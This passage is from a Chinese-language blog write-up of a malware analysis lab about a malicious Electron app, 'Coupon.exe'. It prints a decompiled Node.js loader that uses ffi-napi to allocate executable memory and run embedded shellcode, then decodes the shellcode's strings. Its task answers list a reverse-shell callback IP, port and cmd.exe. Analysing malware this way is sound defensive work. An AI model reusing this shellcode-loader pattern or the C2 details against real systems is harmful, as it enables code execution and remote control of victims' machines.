class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">func_unknown</span>(<span class="params"></span>)</span><br><span class="line">&#123;</span><br><span class="line">	r0 = func_unknown_0000035410FDD9D1</span><br><span class="line">	<span class="keyword">return</span> func_unknown_0000035410FDD9D1</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">func_unknown_0000035410FDD9D1</span>(<span class="params">a0, a1, a2, a3, a4</span>)</span><br><span class="line">&#123;</span><br><span class="line">	r0 = <span class="title function_">a1</span>(<span class="string">&quot;ffi-napi&quot;</span>)</span><br><span class="line">	r1 = <span class="title function_">a1</span>(<span class="string">&quot;ref-napi&quot;</span>)</span><br><span class="line">	r15 = <span class="keyword">new</span> [<span class="number">252</span>, <span class="number">72</span>, <span class="number">129</span>, <span class="number">228</span>, <span class="number">240</span>, <span class="number">255</span>, <span class="number">255</span>, <span class="number">255</span>, <span class="number">232</span>, <span class="number">208</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">65</span>, <span class="number">81</span>, <span class="number">65</span>, <span class="number">80</span>, <span class="number">82</span>, <span class="number">81</span>, <span class="number">86</span>, <span class="number">72</span>, <span class="number">49</span>, <span class="number">210</span>, <span class="number">101</span>, <span class="number">72</span>, <span class="number">139</span>, <span class="number">82</span>, <span class="number">96</span>, <span class="number">62</span>, <span class="number">72</span>, <span class="number">139</span>, <span class="number">82</span>, <span class="number">24</span>, <span class="number">62</span>, <span class="number">72</span>, <span class="number">139</span>, <span class="number">82</span>, <span class="number">32</span>, <span class="number">62</span>, <span class="number">72</span>, <span class="number">139</span>, <span class="number">114</span>, <span class="number">80</span>, <span class="number">62</span>, <span class="number">72</span>, <span class="number">15</span>, <span class="number">183</span>, <span class="number">74</span>, <span class="number">74</span>, <span class="number">77</span>, <span class="number">49</span>, <span class="number">201</span>, <span class="number">72</span>, <span class="number">49</span>, <span class="number">192</span>, <span class="number">172</span>, <span class="number">60</span>, <span class="number">97</span>, <span class="number">124</span>, <span class="number">2</span>, <span class="number">44</span>, <span class="number">32</span>, <span class="number">65</span>, <span class="number">193</span>, <span class="number">201</span>, <span class="number">13</span>, <span class="number">65</span>, <span class="number">1</span>, <span class="number">193</span>, <span class="number">226</span>, <span class="number">237</span>, <span class="number">82</span>, <span class="number">65</span>, <span class="number">81</span>, <span class="number">62</span>, <span class="number">72</span>, <span class="number">139</span>, <span class="number">82</span>, <span class="number">32</span>, <span class="number">62</span>, <span class="number">139</span>, <span class="number">66</span>, <span class="number">60</span>, <span class="number">72</span>, <span class="number">1</span>, <span class="number">208</span>, <span class="number">62</span>, <span class="number">139</span>, <span class="number">128</span>, <span class="number">136</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">72</span>, <span class="number">133</span>, <span class="number">192</span>, <span class="number">116</span>, <span class="number">111</span>, <span class="number">72</span>, <span class="number">1</span>, <span class="number">208</span>, <span class="number">80</span>, <span class="number">62</span>, <span class="number">139</span>, <span class="number">72</span>, <span class="number">24</span>, <span class="number">62</span>, <span class="number">68</span>, <span class="number">139</span>, <span class="number">64</span>, <span class="number">32</span>, <span class="number">73</span>, <span class="number">1</span>, <span class="number">208</span>, <span class="number">227</span>, <span class="number">92</span>, <span class="number">72</span>, <span class="number">255</span>, <span class="number">201</span>, <span class="number">62</span>, <span class="number">65</span>, <span class="number">139</span>, <span class="number">52</span>, <span class="number">136</span>, <span class="number">72</span>, <span class="number">1</span>, <span class="number">214</span>, <span class="number">77</span>, <span class="number">49</span>, <span class="number">201</span>, <span class="number">72</span>, <span class="number">49</span>, <span class="number">192</span>, <span class="number">172</span>, <span class="number">65</span>, <span class="number">193</span>, <span class="number">201</span>, <span class="number">13</span>, <span class="number">65</span>, <span class="number">1</span>, <span class="number">193</span>, <span class="number">56</span>, <span class="number">224</span>, <span class="number">117</span>, <span class="number">241</span>, <span class="number">62</span>, <span class="number">76</span>, <span class="number">3</span>, <span class="number">76</span>, <span class="number">36</span>, <span class="number">8</span>, <span class="number">69</span>, <span class="number">57</span>, <span class="number">209</span>, <span class="number">117</span>, <span class="number">214</span>, <span class="number">88</span>, <span class="number">62</span>, <span class="number">68</span>, <span class="number">139</span>, <span class="number">64</span>, <span class="number">36</span>, <span class="number">73</span>, <span class="number">1</span>, <span class="number">208</span>, <span class="number">102</span>, <span class="number">62</span>, <span class="number">65</span>, <span class="number">139</span>, <span class="number">12</span>, <span class="number">72</span>, <span class="number">62</span>, <span class="number">68</span>, <span class="number">139</span>, <span class="number">64</span>, <span class="number">28</span>, <span class="number">73</span>, <span class="number">1</span>, <span class="number">208</span>, <span class="number">62</span>, <span class="number">65</span>, <span class="number">139</span>, <span class="number">4</span>, <span class="number">136</span>, <span class="number">72</span>, <span class="number">1</span>, <span class="number">208</span>, <span class="number">65</span>, <span class="number">88</span>, <span class="number">65</span>, <span class="number">88</span>, <span class="number">94</span>, <span class="number">89</span>, <span class="number">90</span>, <span class="number">65</span>, <span class="number">88</span>, <span class="number">65</span>, <span class="number">89</span>, <span class="number">65</span>, <span class="number">90</span>, <span class="number">72</span>, <span class="number">131</span>, <span class="number">236</span>, <span class="number">32</span>, <span class="number">65</span>, <span class="number">82</span>, <span class="number">255</span>, <span class="number">224</span>, <span class="number">88</span>, <span class="number">65</span>, <span class="number">89</span>, <span class="number">90</span>, <span class="number">62</span>, <span class="number">72</span>, <span class="number">139</span>, <span class="number">18</span>, <span class="number">233</span>, <span class="number">73</span>, <span class="number">255</span>, <span class="number">255</span>, <span class="number">255</span>, <span class="number">93</span>, <span class="number">62</span>, <span class="number">72</span>, <span class="number">141</span>, <span class="number">141</span>, <span class="number">32</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">65</span>, <span class="number">186</span>, <span class="number">76</span>, <span class="number">119</span>, <span class="number">38</span>, <span class="number">7</span>, <span class="number">255</span>, <span class="number">213</span>, <span class="number">73</span>, <span class="number">199</span>, <span class="number">193</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">62</span>, <span class="number">72</span>, <span class="number">141</span>, <span class="number">149</span>, <span class="number">14</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">62</span>, <span class="number">76</span>, <span class="number">141</span>, <span class="number">133</span>, <span class="number">25</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">72</span>, <span class="number">49</span>, <span class="number">201</span>, <span class="number">65</span>, <span class="number">186</span>, <span class="number">69</span>, <span class="number">131</span>, <span class="number">86</span>, <span class="number">7</span>, <span class="number">255</span>, <span class="number">213</span>, <span class="number">72</span>, <span class="number">49</span>, <span class="number">201</span>, <span class="number">65</span>, <span class="number">186</span>, <span class="number">240</span>, <span class="number">181</span>, <span class="number">162</span>, <span class="number">86</span>, <span class="number">255</span>, <span class="number">213</span>, <span class="number">67</span>, <span class="number">79</span>, <span class="number">85</span>, <span class="number">80</span>, <span class="number">79</span>, <span class="number">78</span>, <span class="number">49</span>, <span class="number">51</span>, <span class="number">51</span>, <span class="number">55</span>, <span class="number">0</span>, <span class="number">80</span>, <span class="number">65</span>, <span class="number">87</span>, <span class="number">78</span>, <span class="number">69</span>, <span class="number">68</span>, <span class="number">0</span>, <span class="number">117</span>, <span class="number">115</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">51</span>, <span class="number">50</span>, <span class="number">46</span>, <span class="number">100</span>, <span class="number">108</span>, <span class="number">108</span>, <span class="number">0</span>]</span><br><span class="line">	r2 = <span class="string">&quot;Buffer&quot;</span>[<span class="string">&quot;from&quot;</span>](r15)</span><br><span class="line">	r6 = r1[<span class="string">&quot;refType&quot;</span>](r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;void&quot;</span>])</span><br><span class="line">	r7 = r1[<span class="string">&quot;refType&quot;</span>](r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;void&quot;</span>])</span><br><span class="line">	r8 = r1[<span class="string">&quot;refType&quot;</span>](r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;uint32&quot;</span>])</span><br><span class="line">	r15 = <span class="keyword">new</span> &#123;<span class="string">&quot;VirtualAlloc&quot;</span>: <span class="literal">null</span>, <span class="string">&quot;RtlMoveMemory&quot;</span>: <span class="literal">null</span>, <span class="string">&quot;CreateThread&quot;</span>: <span class="literal">null</span>, <span class="string">&quot;WaitForSingleObject&quot;</span>: <span class="literal">null</span>&#125;</span><br><span class="line">	r17 = <span class="keyword">new</span> [<span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line">	r17[<span class="number">0</span>] = r7</span><br><span class="line">	r19 = <span class="keyword">new</span> [<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line">	r19[<span class="number">0</span>] = r7</span><br><span class="line">	r19[<span class="number">1</span>] = r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;uint64&quot;</span>]</span><br><span class="line">	r19[<span class="number">2</span>] = r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;uint32&quot;</span>]</span><br><span class="line">	r19[<span class="number">3</span>] = r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;uint32&quot;</span>]</span><br><span class="line">	r17[<span class="number">1</span>] = r19</span><br><span class="line">	r15[<span class="string">&quot;VirtualAlloc&quot;</span>] = r17</span><br><span class="line">	r17 = <span class="keyword">new</span> [<span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line">	r17[<span class="number">0</span>] = r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;void&quot;</span>]</span><br><span class="line">	r19 = <span class="keyword">new</span> [<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line">	r19[<span class="number">0</span>] = r7</span><br><span class="line">	r19[<span class="number">1</span>] = r7</span><br><span class="line">	r19[<span class="number">2</span>] = r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;uint64&quot;</span>]</span><br><span class="line">	r17[<span class="number">1</span>] = r19</span><br><span class="line">	r15[<span class="string">&quot;RtlMoveMemory&quot;</span>] = r17</span><br><span class="line">	r17 = <span class="keyword">new</span> [<span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line">	r17[<span class="number">0</span>] = r6</span><br><span class="line">	r19 = <span class="keyword">new</span> [<span class="string">&quot;pointer&quot;</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line">	r19[<span class="number">1</span>] = r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;uint64&quot;</span>]</span><br><span class="line">	r19[<span class="number">2</span>] = r7</span><br><span class="line">	r19[<span class="number">3</span>] = r7</span><br><span class="line">	r19[<span class="number">4</span>] = r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;uint32&quot;</span>]</span><br><span class="line">	r19[<span class="number">5</span>] = r8</span><br><span class="line">	r17[<span class="number">1</span>] = r19</span><br><span class="line">	r15[<span class="string">&quot;CreateThread&quot;</span>] = r17</span><br><span class="line">	r17 = <span class="keyword">new</span> [<span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line">	r17[<span class="number">0</span>] = r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;uint32&quot;</span>]</span><br><span class="line">	r19 = <span class="keyword">new</span> [<span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line">	r19[<span class="number">0</span>] = r6</span><br><span class="line">	r19[<span class="number">1</span>] = r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;uint32&quot;</span>]</span><br><span class="line">	r17[<span class="number">1</span>] = r19</span><br><span class="line">	r15[<span class="string">&quot;WaitForSingleObject&quot;</span>] = r17</span><br><span class="line">	<span class="variable constant_">ACCU</span> = r0[<span class="string">&quot;Library&quot;</span>]</span><br><span class="line">	r9 = r0[<span class="string">&quot;Library&quot;</span>](<span class="string">&quot;kernel32&quot;</span>, r15)</span><br><span class="line">	<span class="variable constant_">ACCU</span> = <span class="string">&quot;console&quot;</span>[<span class="string">&quot;log&quot;</span>](<span class="string">&quot;shellcode length:&quot;</span>, r2[<span class="string">&quot;length&quot;</span>])</span><br><span class="line">	r14 = r9</span><br><span class="line">	r10 = r9[<span class="string">&quot;VirtualAlloc&quot;</span>](<span class="literal">null</span>, r2[<span class="string">&quot;length&quot;</span>], <span class="number">12288</span>, <span class="number">64</span>)</span><br><span class="line">	<span class="variable constant_">ACCU</span> = <span class="string">&quot;console&quot;</span>[<span class="string">&quot;log&quot;</span>](r10)</span><br><span class="line">	r14 = r9</span><br><span class="line">	r15 = r10</span><br><span class="line">	r16 = r2</span><br><span class="line">	<span class="variable constant_">ACCU</span> = r9[<span class="string">&quot;RtlMoveMemory&quot;</span>](r15, r16, r2[<span class="string">&quot;length&quot;</span>])</span><br><span class="line">	r15 = r1[<span class="string">&quot;refType&quot;</span>](r1[<span class="string">&quot;types&quot;</span>][<span class="string">&quot;uint32&quot;</span>])</span><br><span class="line">	r11 = r1[<span class="string">&quot;alloc&quot;</span>](r15)</span><br><span class="line">	r14 = r9</span><br><span class="line">	r17 = r10</span><br><span class="line">	r20 = r11</span><br><span class="line">	r12 = r9[<span class="string">&quot;CreateThread&quot;</span>](<span class="literal">null</span>, <span class="number">0</span>, r17, <span class="literal">null</span>, <span class="number">0</span>, r20)</span><br><span class="line">	r16 = r11[<span class="string">&quot;readUint32LE&quot;</span>]()</span><br><span class="line">	<span class="variable constant_">ACCU</span> = <span class="string">&quot;console&quot;</span>[<span class="string">&quot;log&quot;</span>](<span class="string">&quot;thread id:&quot;</span>, r16)</span><br><span class="line">	<span class="variable constant_">ACCU</span> = r9[<span class="string">&quot;WaitForSingleObject&quot;</span>](r12, <span class="number">4294967295.0</span>)</span><br><span class="line">	<span class="keyword">return</span> <span class="literal">undefined</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<blockquote>
<p>这段代码是反编译的 JavaScript 代码，主要利用 <code>ffi-napi</code> 和 <code>ref-napi</code> 进行Windows API 调用，最终实现了动态分配内存、写入 shellcode 并执行。</p>
<p><code>ffi-napi</code>：用于调用Windows API函数。</p>
<p><code>ref-napi</code>：用于创建C 语言类型，帮助与 Windows API 交互。</p>
</blockquote>
<p>很容易猜测我们的shellcode就在<code>r15</code>这个数组中，我们将机器码转换为ASCII码</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">üHäðÿÿÿèÐAQAPRQVH1ÒeHR`&gt;HR&gt;HR &gt;HrP&gt;H·JJM1ÉH1À¬<span class="language-xml">&lt;a|, AÁÉ</span></span><br><span class="line"><span class="language-xml">AÁâíRAQ&gt;</span>HR &gt;B<span class="language-xml">&lt;HÐ&gt;</span>HÀtoHÐP&gt;H&gt;D@ IÐã\HÿÉ&gt;A4HÖM1ÉH1À¬AÁÉ</span><br><span class="line">AÁ8àuñ&gt;LL$E9ÑuÖX&gt;D@$IÐf&gt;AH&gt;D@IÐ&gt;AHÐAXAX^YZAXAYAZHì ARÿàXAYZ&gt;HéIÿÿÿ]&gt;H AºLw&amp;ÿÕIÇÁ&gt;H&gt;LH1ÉAºEVÿÕH1ÉAºðµ¢VÿÕCOUPON1337PAWNEDuser32.dll</span><br></pre></td></tr></table></figure>
<p>从中可以看到COUPON1337和user32.dll等有意义字符串</p>
<h2 id="task-answer"><a class="markdownIt-Anchor" href="#task-answer"></a> Task Answer</h2>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">Coupon.exe</span><br><span class="line"></span><br><span class="line">nodeintegration</span><br><span class="line"></span><br><span class="line">websocket, 44500</span><br><span class="line"></span><br><span class="line">ec1ee034ec1ee034</span><br><span class="line"></span><br><span class="line">15.206.13.31, 4444, cmd.exe</span><br><span class="line"></span><br><span class="line">whoami, ipconfig</span><br><span class="line"></span><br><span class="line">vm, runInNewContext</span><br><span class="line"></span><br><span class="line">CreateThread</span><br><span class="line"></span><br><span class="line">COUPON1337</span><br></pre></td></tr></table></figure>

    </div>

    
    <div class="about">
        <h1>About this Post</h1>
        <div class="details">
            <p>This post is written by Chromos2me, licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc/4.0">CC BY-NC 4.0</a>.</p>
        </div>
        
        <p class="tags">
            
            <i class="icon"></i>
            <a href="/tags/Malware-Analysis/" class="tag">#Malware Analysis</a><a href="/tags/Traffic-Analysis/" class="tag">#Traffic Analysis</a>
        </p>
        
    </div>
    

    <div class="container post-prev-next">
        
        <a href="/2025/04/11/CVE-2022%E2%80%9326923%E5%9F%9F%E5%86%85%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E/" class="next">
            <div>
                <div class="text">
                    <p class="label">Next</p>
                    <h3 class="title">CVE-2022–26923域内提权漏洞</h3>
                </div>
            </div>
        </a>
        
        
        <a href="/2025/03/02/HTB-Rebound/" class="prev">
            <div>
                <div class="text">
                    <p class="label">Previous</p>
                    <h3 class="title">HTB-Rebound</>
                </div>
            </div>
        </a>
        
    </div>

    
        
        
    
</article>

        <footer>
    <div class="inner">
        <div class="links">
            
            <div class="group">
                <h2 class="title">Blog</h2>
                
                <a href="/" class="item">Blog</a>
                
                <a href="/archives" class="item">Archives</a>
                
                <a href="/tags" class="item">Tags</a>
                
                <a href="/categories" class="item">Categories</a>
                
                <a href="/search" class="item">Search</a>
                
                <a href="/friends" class="item">Friends</a>
                
                <a href="/about" class="item">About</a>
                
            </div>
            
            <div class="group">
                <h2 class="title">Me</h2>
                
                <a target="_blank" rel="noopener" href="https://github.com/Chromos2me" class="item">GitHub</a>
                
                <a href="3079749425@qq.com" class="item">Email</a>
                
            </div>
            
        </div>
        <span>&copy; 2025 Chromos2me<br>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> </span>
        
        
            <br>
            <div class="color-scheme-toggle" role="radiogroup" id="theme-color-scheme-toggle">
                <label>
                    <input type="radio" value="light">
                    <span>Light</span>
                </label>
                <label>
                    <input type="radio" value="dark">
                    <span>Dark</span>
                </label>
                <label>
                    <input type="radio" value="auto">
                    <span>Auto</span>
                </label>
            </div>
        
    </div>
</footer>


        
<script src="/js/main.js"></script>

        
        
        

        
        <script src="https://unpkg.com/scrollreveal"></script>
        <script>
            window.addEventListener('load', () => {
                ScrollReveal({ delay: 250, reset: true, easing: 'cubic-bezier(0, 0, 0, 1)' })
                ScrollReveal().reveal('.post-list-item .cover-img img')
                ScrollReveal().reveal('.post-list-item, .card, .content p img, .content .block-large img', { distance: '60px', origin: 'bottom', duration: 800 })
            })
        </script>
        
    <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="//cdn.bootcss.com/mathjax/2.7.3/MathJax.js?config=TeX-MML-AM_CHTML"></script>

</body>
</html>